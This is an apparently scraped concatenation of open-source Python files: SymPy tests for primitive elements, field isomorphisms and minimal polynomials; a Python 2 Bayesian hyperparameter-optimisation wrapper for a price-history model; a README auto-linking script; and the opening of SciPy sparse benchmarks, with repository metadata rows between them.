assert primitive_element([sqrt(2)], x) == (x**2 - 2, [1])
assert primitive_element(
[sqrt(2), sqrt(3)], x) == (x**4 - 10*x**2 + 1, [1, 1])
assert primitive_element([sqrt(2)], x, polys=True) == (Poly(x**2 - 2), [1])
assert primitive_element([sqrt(
2), sqrt(3)], x, polys=True) == (Poly(x**4 - 10*x**2 + 1), [1, 1])
assert primitive_element(
[sqrt(2)], x, ex=True) == (x**2 - 2, [1], [[1, 0]])
assert primitive_element([sqrt(2), sqrt(3)], x, ex=True) == \
(x**4 - 10*x**2 + 1, [1, 1], [[Q(1, 2), 0, -Q(9, 2), 0], [-
Q(1, 2), 0, Q(11, 2), 0]])
assert primitive_element(
[sqrt(2)], x, ex=True, polys=True) == (Poly(x**2 - 2), [1], [[1, 0]])
assert primitive_element([sqrt(2), sqrt(3)], x, ex=True, polys=True) == \
(Poly(x**4 - 10*x**2 + 1), [1, 1], [[Q(1, 2), 0, -Q(9, 2),
0], [-Q(1, 2), 0, Q(11, 2), 0]])
assert primitive_element([sqrt(2)], polys=True) == (Poly(x**2 - 2), [1])
raises(ValueError, lambda: primitive_element([], x, ex=False))
raises(ValueError, lambda: primitive_element([], x, ex=True))
# Issue 14117
a, b = I*sqrt(2*sqrt(2) + 3), I*sqrt(-2*sqrt(2) + 3)
assert primitive_element([a, b, I], x) == (x**4 + 6*x**2 + 1, [1, 0, 0])
def test_field_isomorphism_pslq():
a = AlgebraicNumber(I)
b = AlgebraicNumber(I*sqrt(3))
raises(NotImplementedError, lambda: field_isomorphism_pslq(a, b))
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(3))
c = AlgebraicNumber(sqrt(7))
d = AlgebraicNumber(sqrt(2) + sqrt(3))
e = AlgebraicNumber(sqrt(2) + sqrt(3) + sqrt(7))
assert field_isomorphism_pslq(a, a) == [1, 0]
assert field_isomorphism_pslq(a, b) is None
assert field_isomorphism_pslq(a, c) is None
assert field_isomorphism_pslq(a, d) == [Q(1, 2), 0, -Q(9, 2), 0]
assert field_isomorphism_pslq(
a, e) == [Q(1, 80), 0, -Q(1, 2), 0, Q(59, 20), 0]
assert field_isomorphism_pslq(b, a) is None
assert field_isomorphism_pslq(b, b) == [1, 0]
assert field_isomorphism_pslq(b, c) is None
assert field_isomorphism_pslq(b, d) == [-Q(1, 2), 0, Q(11, 2), 0]
assert field_isomorphism_pslq(b, e) == [-Q(
3, 640), 0, Q(67, 320), 0, -Q(297, 160), 0, Q(313, 80), 0]
assert field_isomorphism_pslq(c, a) is None
assert field_isomorphism_pslq(c, b) is None
assert field_isomorphism_pslq(c, c) == [1, 0]
assert field_isomorphism_pslq(c, d) is None
assert field_isomorphism_pslq(c, e) == [Q(
3, 640), 0, -Q(71, 320), 0, Q(377, 160), 0, -Q(469, 80), 0]
assert field_isomorphism_pslq(d, a) is None
assert field_isomorphism_pslq(d, b) is None
assert field_isomorphism_pslq(d, c) is None
assert field_isomorphism_pslq(d, d) == [1, 0]
assert field_isomorphism_pslq(d, e) == [-Q(
3, 640), 0, Q(71, 320), 0, -Q(377, 160), 0, Q(549, 80), 0]
assert field_isomorphism_pslq(e, a) is None
assert field_isomorphism_pslq(e, b) is None
assert field_isomorphism_pslq(e, c) is None
assert field_isomorphism_pslq(e, d) is None
assert field_isomorphism_pslq(e, e) == [1, 0]
f = AlgebraicNumber(3*sqrt(2) + 8*sqrt(7) - 5)
assert field_isomorphism_pslq(
f, e) == [Q(3, 80), 0, -Q(139, 80), 0, Q(347, 20), 0, -Q(761, 20), -5]
def test_field_isomorphism():
assert field_isomorphism(3, sqrt(2)) == [3]
assert field_isomorphism( I*sqrt(3), I*sqrt(3)/2) == [ 2, 0]
assert field_isomorphism(-I*sqrt(3), I*sqrt(3)/2) == [-2, 0]
assert field_isomorphism( I*sqrt(3), -I*sqrt(3)/2) == [-2, 0]
assert field_isomorphism(-I*sqrt(3), -I*sqrt(3)/2) == [ 2, 0]
assert field_isomorphism( 2*I*sqrt(3)/7, 5*I*sqrt(3)/3) == [ S(6)/35, 0]
assert field_isomorphism(-2*I*sqrt(3)/7, 5*I*sqrt(3)/3) == [-S(6)/35, 0]
assert field_isomorphism( 2*I*sqrt(3)/7, -5*I*sqrt(3)/3) == [-S(6)/35, 0]
assert field_isomorphism(-2*I*sqrt(3)/7, -5*I*sqrt(3)/3) == [ S(6)/35, 0]
assert field_isomorphism(
2*I*sqrt(3)/7 + 27, 5*I*sqrt(3)/3) == [ S(6)/35, 27]
assert field_isomorphism(
-2*I*sqrt(3)/7 + 27, 5*I*sqrt(3)/3) == [-S(6)/35, 27]
assert field_isomorphism(
2*I*sqrt(3)/7 + 27, -5*I*sqrt(3)/3) == [-S(6)/35, 27]
assert field_isomorphism(
-2*I*sqrt(3)/7 + 27, -5*I*sqrt(3)/3) == [ S(6)/35, 27]
p = AlgebraicNumber( sqrt(2) + sqrt(3))
q = AlgebraicNumber(-sqrt(2) + sqrt(3))
r = AlgebraicNumber( sqrt(2) - sqrt(3))
s = AlgebraicNumber(-sqrt(2) - sqrt(3))
pos_coeffs = [ S(1)/2, S(0), -S(9)/2, S(0)]
neg_coeffs = [-S(1)/2, S(0), S(9)/2, S(0)]
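    # These lists are polynomial coefficients (highest degree first) in the
    # target generator: with t = sqrt(2) + sqrt(3), t**3 = 11*sqrt(2) + 9*sqrt(3),
    # so (1/2)*t**3 - (9/2)*t == sqrt(2), which is exactly what pos_coeffs encode.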
a = AlgebraicNumber(sqrt(2))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == neg_coeffs
assert field_isomorphism(a, p, fast=False) == pos_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == neg_coeffs
a = AlgebraicNumber(-sqrt(2))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == pos_coeffs
assert field_isomorphism(a, r, fast=True) == neg_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == pos_coeffs
assert field_isomorphism(a, r, fast=False) == neg_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
pos_coeffs = [ S(1)/2, S(0), -S(11)/2, S(0)]
neg_coeffs = [-S(1)/2, S(0), S(11)/2, S(0)]
a = AlgebraicNumber(sqrt(3))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
a = AlgebraicNumber(-sqrt(3))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_coeffs
assert field_isomorphism(a, q, fast=True) == pos_coeffs
assert field_isomorphism(a, r, fast=True) == neg_coeffs
assert field_isomorphism(a, s, fast=True) == neg_coeffs
assert field_isomorphism(a, p, fast=False) == pos_coeffs
assert field_isomorphism(a, q, fast=False) == pos_coeffs
assert field_isomorphism(a, r, fast=False) == neg_coeffs
assert field_isomorphism(a, s, fast=False) == neg_coeffs
pos_coeffs = [ S(3)/2, S(0), -S(33)/2, -S(8)]
neg_coeffs = [-S(3)/2, S(0), S(33)/2, -S(8)]
a = AlgebraicNumber(3*sqrt(3) - 8)
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
a = AlgebraicNumber(3*sqrt(2) + 2*sqrt(3) + 1)
pos_1_coeffs = [ S(1)/2, S(0), -S(5)/2, S(1)]
neg_5_coeffs = [-S(5)/2, S(0), S(49)/2, S(1)]
pos_5_coeffs = [ S(5)/2, S(0), -S(49)/2, S(1)]
neg_1_coeffs = [-S(1)/2, S(0), S(5)/2, S(1)]
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_1_coeffs
assert field_isomorphism(a, q, fast=True) == neg_5_coeffs
assert field_isomorphism(a, r, fast=True) == pos_5_coeffs
assert field_isomorphism(a, s, fast=True) == neg_1_coeffs
assert field_isomorphism(a, p, fast=False) == pos_1_coeffs
assert field_isomorphism(a, q, fast=False) == neg_5_coeffs
assert field_isomorphism(a, r, fast=False) == pos_5_coeffs
assert field_isomorphism(a, s, fast=False) == neg_1_coeffs
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(3))
c = AlgebraicNumber(sqrt(7))
assert is_isomorphism_possible(a, b) is True
assert is_isomorphism_possible(b, a) is True
assert is_isomorphism_possible(c, p) is False
assert field_isomorphism(sqrt(2), sqrt(3), fast=True) is None
assert field_isomorphism(sqrt(3), sqrt(2), fast=True) is None
assert field_isomorphism(sqrt(2), sqrt(3), fast=False) is None
assert field_isomorphism(sqrt(3), sqrt(2), fast=False) is None
def test_to_number_field():
assert to_number_field(sqrt(2)) == AlgebraicNumber(sqrt(2))
assert to_number_field(
[sqrt(2), sqrt(3)]) == AlgebraicNumber(sqrt(2) + sqrt(3))
a = AlgebraicNumber(sqrt(2) + sqrt(3), [S(1)/2, S(0), -S(9)/2, S(0)])
assert to_number_field(sqrt(2), sqrt(2) + sqrt(3)) == a
assert to_number_field(sqrt(2), AlgebraicNumber(sqrt(2) + sqrt(3))) == a
raises(IsomorphismFailed, lambda: to_number_field(sqrt(2), sqrt(3)))
def test_AlgebraicNumber():
minpoly, root = x**2 - 2, sqrt(2)
a = AlgebraicNumber(root, gen=x)
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
assert a.root == root
assert a.alias is None
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is False
assert a.coeffs() == [S(1), S(0)]
assert a.native_coeffs() == [QQ(1), QQ(0)]
a = AlgebraicNumber(root, gen=x, alias='y')
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
assert a.root == root
assert a.alias == Symbol('y')
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is True
a = AlgebraicNumber(root, gen=x, alias=Symbol('y'))
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
assert a.root == root
assert a.alias == Symbol('y')
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is True
assert AlgebraicNumber(sqrt(2), []).rep == DMP([], QQ)
assert AlgebraicNumber(sqrt(2), ()).rep == DMP([], QQ)
assert AlgebraicNumber(sqrt(2), (0, 0)).rep == DMP([], QQ)
assert AlgebraicNumber(sqrt(2), [8]).rep == DMP([QQ(8)], QQ)
assert AlgebraicNumber(sqrt(2), [S(8)/3]).rep == DMP([QQ(8, 3)], QQ)
assert AlgebraicNumber(sqrt(2), [7, 3]).rep == DMP([QQ(7), QQ(3)], QQ)
assert AlgebraicNumber(
sqrt(2), [S(7)/9, S(3)/2]).rep == DMP([QQ(7, 9), QQ(3, 2)], QQ)
assert AlgebraicNumber(sqrt(2), [1, 2, 3]).rep == DMP([QQ(2), QQ(5)], QQ)
a = AlgebraicNumber(AlgebraicNumber(root, gen=x), [1, 2])
assert a.rep == DMP([QQ(1), QQ(2)], QQ)
assert a.root == root
assert a.alias is None
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is False
assert a.coeffs() == [S(1), S(2)]
assert a.native_coeffs() == [QQ(1), QQ(2)]
a = AlgebraicNumber((minpoly, root), [1, 2])
assert a.rep == DMP([QQ(1), QQ(2)], QQ)
assert a.root == root
assert a.alias is None
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is False
a = AlgebraicNumber((Poly(minpoly), root), [1, 2])
assert a.rep == DMP([QQ(1), QQ(2)], QQ)
assert a.root == root
assert a.alias is None
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is False
assert AlgebraicNumber( sqrt(3)).rep == DMP([ QQ(1), QQ(0)], QQ)
assert AlgebraicNumber(-sqrt(3)).rep == DMP([ QQ(1), QQ(0)], QQ)
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(2))
assert a == b
c = AlgebraicNumber(sqrt(2), gen=x)
d = AlgebraicNumber(sqrt(2), gen=x)
assert a == b
assert a == c
a = AlgebraicNumber(sqrt(2), [1, 2])
b = AlgebraicNumber(sqrt(2), [1, 3])
assert a != b and a != sqrt(2) + 3
assert (a == x) is False and (a != x) is True
a = AlgebraicNumber(sqrt(2), [1, 0])
b = AlgebraicNumber(sqrt(2), [1, 0], alias=y)
assert a.as_poly(x) == Poly(x)
assert b.as_poly() == Poly(y)
assert a.as_expr() == sqrt(2)
assert a.as_expr(x) == x
assert b.as_expr() == sqrt(2)
assert b.as_expr(x) == x
a = AlgebraicNumber(sqrt(2), [2, 3])
b = AlgebraicNumber(sqrt(2), [2, 3], alias=y)
p = a.as_poly()
assert p == Poly(2*p.gen + 3)
assert a.as_poly(x) == Poly(2*x + 3)
assert b.as_poly() == Poly(2*y + 3)
assert a.as_expr() == 2*sqrt(2) + 3
assert a.as_expr(x) == 2*x + 3
assert b.as_expr() == 2*sqrt(2) + 3
assert b.as_expr(x) == 2*x + 3
a = AlgebraicNumber(sqrt(2))
b = to_number_field(sqrt(2))
assert a.args == b.args == (sqrt(2), Tuple(1, 0))
b = AlgebraicNumber(sqrt(2), alias='alpha')
assert b.args == (sqrt(2), Tuple(1, 0), Symbol('alpha'))
a = AlgebraicNumber(sqrt(2), [1, 2, 3])
assert a.args == (sqrt(2), Tuple(1, 2, 3))
def test_to_algebraic_integer():
a = AlgebraicNumber(sqrt(3), gen=x).to_algebraic_integer()
assert a.minpoly == x**2 - 3
assert a.root == sqrt(3)
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
a = AlgebraicNumber(2*sqrt(3), gen=x).to_algebraic_integer()
assert a.minpoly == x**2 - 12
assert a.root == 2*sqrt(3)
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
a = AlgebraicNumber(sqrt(3)/2, gen=x).to_algebraic_integer()
assert a.minpoly == x**2 - 12
assert a.root == 2*sqrt(3)
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
a = AlgebraicNumber(sqrt(3)/2, [S(7)/19, 3], gen=x).to_algebraic_integer()
assert a.minpoly == x**2 - 12
assert a.root == 2*sqrt(3)
assert a.rep == DMP([QQ(7, 19), QQ(3)], QQ)
def test_IntervalPrinter():
ip = IntervalPrinter()
assert ip.doprint(x**Q(1, 3)) == "x**(mpi('1/3'))"
assert ip.doprint(sqrt(x)) == "x**(mpi('1/2'))"
def test_isolate():
assert isolate(1) == (1, 1)
assert isolate(S(1)/2) == (S(1)/2, S(1)/2)
assert isolate(sqrt(2)) == (1, 2)
assert isolate(-sqrt(2)) == (-2, -1)
assert isolate(sqrt(2), eps=S(1)/100) == (S(24)/17, S(17)/12)
assert isolate(-sqrt(2), eps=S(1)/100) == (-S(17)/12, -S(24)/17)
raises(NotImplementedError, lambda: isolate(I))
def test_minpoly_fraction_field():
assert minimal_polynomial(1/x, y) == -x*y + 1
assert minimal_polynomial(1 / (x + 1), y) == (x + 1)*y - 1
assert minimal_polynomial(sqrt(x), y) == y**2 - x
assert minimal_polynomial(sqrt(x + 1), y) == y**2 - x - 1
assert minimal_polynomial(sqrt(x) / x, y) == x*y**2 - 1
assert minimal_polynomial(sqrt(2) * sqrt(x), y) == y**2 - 2 * x
assert minimal_polynomial(sqrt(2) + sqrt(x), y) == \
y**4 + (-2*x - 4)*y**2 + x**2 - 4*x + 4
assert minimal_polynomial(x**Rational(1,3), y) == y**3 - x
assert minimal_polynomial(x**Rational(1,3) + sqrt(x), y) == \
y**6 - 3*x*y**4 - 2*x*y**3 + 3*x**2*y**2 - 6*x**2*y - x**3 + x**2
assert minimal_polynomial(sqrt(x) / z, y) == z**2*y**2 - x
assert minimal_polynomial(sqrt(x) / (z + 1), y) == (z**2 + 2*z + 1)*y**2 - x
assert minimal_polynomial(1/x, y, polys=True) == Poly(-x*y + 1, y)
assert minimal_polynomial(1 / (x + 1), y, polys=True) == \
Poly((x + 1)*y - 1, y)
assert minimal_polynomial(sqrt(x), y, polys=True) == Poly(y**2 - x, y)
assert minimal_polynomial(sqrt(x) / z, y, polys=True) == \
Poly(z**2*y**2 - x, y)
# this is (sqrt(1 + x**3)/x).integrate(x).diff(x) - sqrt(1 + x**3)/x
a = sqrt(x)/sqrt(1 + x**(-3)) - sqrt(x**3 + 1)/x + 1/(x**(S(5)/2)* \
(1 + x**(-3))**(S(3)/2)) + 1/(x**(S(11)/2)*(1 + x**(-3))**(S(3)/2))
assert minimal_polynomial(a, y) == y
raises(NotAlgebraic, lambda: minimal_polynomial(exp(x), y))
raises(GeneratorsError, lambda: minimal_polynomial(sqrt(x), x))
raises(GeneratorsError, lambda: minimal_polynomial(sqrt(x) - y, x))
raises(NotImplementedError, lambda: minimal_polynomial(sqrt(x), y, compose=False))
@slow
def test_minpoly_fraction_field_slow():
assert minimal_polynomial(minimal_polynomial(sqrt(x**Rational(1,5) - 1),
y).subs(y, sqrt(x**Rational(1,5) - 1)), z) == z
def test_minpoly_domain():
assert minimal_polynomial(sqrt(2), x, domain=QQ.algebraic_field(sqrt(2))) == \
x - sqrt(2)
assert minimal_polynomial(sqrt(8), x, domain=QQ.algebraic_field(sqrt(2))) == \
x - 2*sqrt(2)
assert minimal_polynomial(sqrt(Rational(3,2)), x,
domain=QQ.algebraic_field(sqrt(2))) == 2*x**2 - 3
raises(NotAlgebraic, lambda: minimal_polynomial(y, x, domain=QQ))
| gpl-2.0 | -7,219,002,142,231,568,000 | 37.005312 | 154 | 0.586379 | false | 2.645895 | true | false | false |
pligor/predicting-future-product-prices | 04_time_series_prediction/gp_opt/price_history_27_gp_opt.py | 1 | 6918 | from models.model_21_price_history_seq2seq_dyn_dec_ins import PriceHistorySeq2SeqDynDecIns
import pickle
import dill
from os import path, remove
import numpy as np
from skopt.space.space import Integer, Real, Categorical
from skopt import gp_minimize
import tensorflow as tf
from mylibs.jupyter_notebook_helper import MyOptimizeResult
class PriceHistoryGpOpt(object):
NUM_GPUS = 1
LAMDA2_COUNT = 3
    # (silly?) idea: use random instances instead of the full training dataset on every Bayesian optimization run (not sure about this)
def __init__(self, model, stats_npy_filename, cv_score_dict_npy_filename, res_gp_filename, bayes_opt_dir,
random_state=None, plotter=None, **kwargs):
super(PriceHistoryGpOpt, self).__init__()
self.model = model
self.static_params = kwargs
self.plotter = plotter
self.random_state = random_state
self.stats_filepath = bayes_opt_dir + '/' + stats_npy_filename + '.npy'
self.cv_score_dict_filepath = bayes_opt_dir + '/' + cv_score_dict_npy_filename + '.npy'
self.res_gp_filepath = bayes_opt_dir + '/{}.pickle'.format(res_gp_filename)
def run_opt(self, n_random_starts, n_calls):
if path.isfile(self.res_gp_filepath):
with open(self.res_gp_filepath) as fp: # Python 3: open(..., 'rb')
opt_res = pickle.load(fp)
else:
res_gp = self.gpOptimization(n_random_starts=n_random_starts, n_calls=n_calls)
opt_res = MyOptimizeResult(res_gp=res_gp)
with open(self.res_gp_filepath, 'w') as fp: # Python 3: open(..., 'wb')
pickle.dump(opt_res, fp)
return opt_res
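    # Illustrative usage sketch (argument values below are assumptions for
    # demonstration only, not taken from this project's experiments):
    #   opt = PriceHistoryGpOpt(model=model, stats_npy_filename='stats',
    #                           cv_score_dict_npy_filename='cv_scores',
    #                           res_gp_filename='res_gp', bayes_opt_dir='bayes_opt',
    #                           random_state=42, epochs=20)
    #   opt_res = opt.run_opt(n_random_starts=10, n_calls=30)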
def objective(self, params): # Here we define the metric we want to minimise
params_str = "params: {}".format(params)
        print 'num_units, keep_prob_rnn_out, keep_prob_readout, learning_rate, rnn_hidden_dim, mobile_attrs_dim, lamdas'
print params_str
# try:
cv_score, stats_list = self.get_or_calc(params=params)
# save everytime in case it crashes
self.__save_dictionary(filepath=self.stats_filepath, key=params, val=stats_list)
self.__save_dictionary(filepath=self.cv_score_dict_filepath, key=params, val=cv_score)
if self.plotter is not None:
self.plotter(stats_list=stats_list, label_text=params_str)
# except AssertionError:
# cv_score = None
#
# return None
return cv_score # minimize validation error
def get_or_calc(self, params):
params = tuple(params)
if path.isfile(self.cv_score_dict_filepath):
cv_score_dict = np.load(self.cv_score_dict_filepath)[()]
if params in cv_score_dict:
stats_dic = np.load(self.stats_filepath)[()]
assert params in stats_dic, 'if you have created a cv score you must have saved the stats list before'
cv_score, stats_list = cv_score_dict[params], stats_dic[params]
else:
cv_score, stats_list = self.calc(params=params)
else:
cv_score, stats_list = self.calc(params=params)
return cv_score, stats_list
def calc(self, params):
num_units, keep_prob_rnn_out, keep_prob_readout, learning_rate, rnn_hidden_dim, mobile_attrs_dim = params[
:-self.LAMDA2_COUNT]
lamda2_list = params[-self.LAMDA2_COUNT:]
cv_score, stats_list = self.model.get_cross_validation_score(
enc_num_units=num_units,
dec_num_units=num_units,
keep_prob_rnn_out=keep_prob_rnn_out,
keep_prob_readout=keep_prob_readout,
learning_rate=learning_rate,
rnn_hidden_dim=rnn_hidden_dim,
mobile_attrs_dim=mobile_attrs_dim,
lamda2=lamda2_list,
# DO NOT TEST
decoder_first_input=PriceHistorySeq2SeqDynDecIns.DECODER_FIRST_INPUT.ZEROS,
batch_norm_enabled=True,
**self.static_params
)
return cv_score, stats_list
@staticmethod
def __save_dictionary(filepath, key, val):
if filepath is not None:
stats_dic = np.load(filepath)[()] if path.isfile(filepath) else dict()
stats_dic[tuple(key)] = val
np.save(filepath, stats_dic)
# def __clear_previously_saved_files(self):
# #filepaths = [self.stats_filepath, self.cv_score_dict_filepath]
# filepaths = [self.stats_filepath,]
# for filepath in filepaths:
# if path.isfile(filepath):
# remove(self.stats_filepath) # delete previously saved file
def gpOptimization(self, n_random_starts, n_calls):
# self.__clear_previously_saved_files()
# here we will exploit the information from the previous experiment to calibrate what we think are the best parameters
# best_params = [500, #50 was obviously small so we are going to range it from 300 to 700
# tf.nn.tanh, #activation we are not going to try and guess via gp opt, but just use this one
# 0.0001, #since we had as optimal the smallest one we are going to try and allow also smaller values
# 0.62488034788862112,
# 0.001]
num_units = Integer(300, 600) # the upper limit is mostly because of computational resources
rnn_hidden_dim = Integer(100, 300) # the upper limit is mostly because of computational resources
mobile_attrs_dim = Integer(100, 300) # the upper limit is mostly because of computational resources
keep_prob_rnn_out = Real(0.5, 1.0, prior='uniform') # uniform or log-uniform
keep_prob_readout = Real(0.5, 1.0, prior='uniform')
learning_rate = Real(1e-6, 1e-2, prior='log-uniform') # uniform or log-uniform
lamda2_list = [Real(1e-5, 1e0, prior='log-uniform')] * self.LAMDA2_COUNT # uniform or log-uniform
space = [num_units, keep_prob_rnn_out, keep_prob_readout, learning_rate, rnn_hidden_dim,
mobile_attrs_dim] + lamda2_list
return gp_minimize(
func=self.objective, # function that we wish to minimise
dimensions=space, # the search space for the hyper-parameters
# x0=x0, #inital values for the hyper-parameters
n_calls=n_calls, # number of times the function will be evaluated
random_state=self.random_state, # random seed
n_random_starts=n_random_starts, # before we start modelling the optimised function with a GP Regression
# model, we want to try a few random choices for the hyper-parameters.
# kappa=1.9, # trade-off between exploration vs. exploitation.
n_jobs=self.NUM_GPUS
)
| agpl-3.0 | -3,510,144,819,399,291,400 | 44.81457 | 131 | 0.616941 | false | 3.666137 | false | false | false |
marcomaccio/python-docs-samples | scripts/auto_link_to_docs.py | 1 | 3864 | #!/usr/bin/env python
# Copyright (C) 2013 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Processes docs-links.json, updates all READMEs, and replaces
<!-- auto-doc-link --><!-- end-auto-doc-link -->
with a generated list of documentation backlinks.
"""
from collections import defaultdict
import json
import os
import re
REPO_ROOT = os.path.abspath(os.path.join(
os.path.dirname(__file__),
'..'))
DOC_SITE_ROOT = 'https://cloud.google.com'
AUTO_DOC_LINK_EXP = re.compile(
r'<!-- auto-doc-link -->.*?<!-- end-auto-doc-link -->\n',
re.DOTALL)
def invert_docs_link_map(docs_links):
"""
The docs links map is in this format:
{
"doc_path": [
"file_path",
]
}
This transforms it to:
{
"file_path": [
"doc_path",
]
}
"""
files_to_docs = defaultdict(list)
for doc, files in docs_links.iteritems():
for file in files:
files_to_docs[file].append(doc)
files_to_docs[file] = list(set(files_to_docs[file]))
return files_to_docs
def collect_docs_for_readmes(files_to_docs):
"""
There's a one-to-many relationship between readmes and files. This method
finds the readme for each file and consolidates all docs references.
"""
readmes_to_docs = defaultdict(list)
for file, docs in files_to_docs.iteritems():
readme = get_readme_path(file)
readmes_to_docs[readme].extend(docs)
readmes_to_docs[readme] = list(set(readmes_to_docs[readme]))
return readmes_to_docs
def linkify(docs):
"""Adds the documentation site root to doc paths, creating a full URL."""
return [DOC_SITE_ROOT + x for x in docs]
def replace_contents(file_path, regex, new_content):
with open(file_path, 'r+') as f:
content = f.read()
content = regex.sub(new_content, content)
f.seek(0)
f.write(content)
def get_readme_path(file_path):
"""Gets the readme for an associated sample file, basically just the
README.md in the same directory."""
dir = os.path.dirname(file_path)
readme = os.path.join(
REPO_ROOT, dir, 'README.md')
return readme
def generate_doc_link_statement(docs):
links = linkify(docs)
if len(links) == 1:
return """<!-- auto-doc-link -->
These samples are used on the following documentation page:
> {}
<!-- end-auto-doc-link -->
""".format(links.pop())
else:
return """<!-- auto-doc-link -->
These samples are used on the following documentation pages:
>
{}
<!-- end-auto-doc-link -->
""".format('\n'.join(['* {}'.format(x) for x in links]))
def update_readme(readme_path, docs):
if not os.path.exists(readme_path):
print('{} doesn\'t exist'.format(readme_path))
return
replace_contents(
readme_path,
AUTO_DOC_LINK_EXP,
generate_doc_link_statement(docs))
print('Updated {}'.format(readme_path))
def main():
docs_links = json.load(open(
os.path.join(REPO_ROOT, 'scripts', 'docs-links.json'), 'r'))
files_to_docs = invert_docs_link_map(docs_links)
readmes_to_docs = collect_docs_for_readmes(files_to_docs)
for readme, docs in readmes_to_docs.iteritems():
update_readme(readme, docs)
if __name__ == '__main__':
main()
| apache-2.0 | 8,503,063,250,779,012,000 | 25.833333 | 77 | 0.627329 | false | 3.503173 | false | false | false |
dominicelse/scipy | benchmarks/benchmarks/sparse.py | 1 | 10059 | """
Simple benchmarks for the sparse module
"""
from __future__ import division, print_function, absolute_import
import warnings
import time
import timeit
import numpy
import numpy as np
from numpy import ones, array, asarray, empty, random, zeros
try:
from scipy import sparse
from scipy.sparse import (csr_matrix, coo_matrix, dia_matrix, lil_matrix,
dok_matrix, rand, SparseEfficiencyWarning)
except ImportError:
pass
from .common import Benchmark
def random_sparse(m, n, nnz_per_row):
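    # Builds an m-by-n CSR matrix with nnz_per_row randomly placed entries per
    # row; duplicate (row, col) pairs are summed by the COO -> CSR conversion,
    # so a row may end up with slightly fewer stored entries.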
rows = numpy.arange(m).repeat(nnz_per_row)
cols = numpy.random.randint(0, n, size=nnz_per_row*m)
vals = numpy.random.random_sample(m*nnz_per_row)
return coo_matrix((vals, (rows, cols)), (m, n)).tocsr()
# TODO move this to a matrix gallery and add unittests
def poisson2d(N, dtype='d', format=None):
"""
Return a sparse matrix for the 2D Poisson problem
with standard 5-point finite difference stencil on a
square N-by-N grid.
"""
if N == 1:
diags = asarray([[4]], dtype=dtype)
return dia_matrix((diags, [0]), shape=(1, 1)).asformat(format)
offsets = array([0, -N, N, -1, 1])
diags = empty((5, N**2), dtype=dtype)
diags[0] = 4 # main diagonal
diags[1:] = -1 # all offdiagonals
diags[3, N-1::N] = 0 # first lower diagonal
diags[4, N::N] = 0 # first upper diagonal
return dia_matrix((diags, offsets), shape=(N**2, N**2)).asformat(format)
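# Illustrative example (not part of the benchmarks): poisson2d(2).toarray() is
# the 4x4 Laplacian of a 2x2 grid:
#   [[ 4., -1., -1.,  0.],
#    [-1.,  4.,  0., -1.],
#    [-1.,  0.,  4., -1.],
#    [ 0., -1., -1.,  4.]]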
class Arithmetic(Benchmark):
param_names = ['format', 'XY', 'op']
params = [
['csr'],
['AA', 'AB', 'BA', 'BB'],
